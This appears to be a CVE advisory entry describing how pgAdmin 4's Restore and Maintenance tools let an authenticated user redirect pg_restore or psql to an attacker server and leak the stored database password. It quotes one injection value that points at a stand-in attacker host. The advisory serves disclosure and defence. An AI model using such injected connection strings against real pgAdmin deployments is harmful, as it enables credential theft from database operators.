Impact
pgAdmin 4’s Restore and Maintenance tools expose the client‑supplied database field directly to the --dbname option of pg_restore and psql. The libpq library expands a database name containing an equals sign into a full connection string, giving embedded keywords precedence over the host and port parameters supplied by pgAdmin. An attacker can therefore supply a value such as "host=attacker.example port=5432 dbname=x" causing the utility to connect to an attacker‑controlled server. Because pgAdmin exports the stored database password into the PGPASSWORD environment variable before invoking the utility, the redirected connection presents that credential to the external endpoint, allowing credential theft and the possibility of further interaction with the target database.
Affected Systems
The vulnerability affects pgAdmin 4 releases that introduced the --dbname argument in the Restore and Maintenance tools, before version 9.18. Any authenticated user with the tools_restore or tools_maintenance permission, which the default User role grants, can trigger the exploit. The issue is confined to the pgAdmin 4 application and the database servers it connects to.
Risk and Exploitability
The CVSS score of 7.1 classifies this as a moderate‑to‑high severity vulnerability. Although the EPSS score is currently unavailable and the flaw is not listed in CISA’s KEV catalog, the attack vector remains within the context of an authenticated client session using pgAdmin. The risk is that an attacker with legitimate credentials can cause pgAdmin to expose sensitive credentials to arbitrary external services and establish unexpected outbound connections from the pgAdmin host. The exploit does not require additional privileges beyond those normally granted to a user with Restore or Maintenance tool access.
OpenCVE Enrichment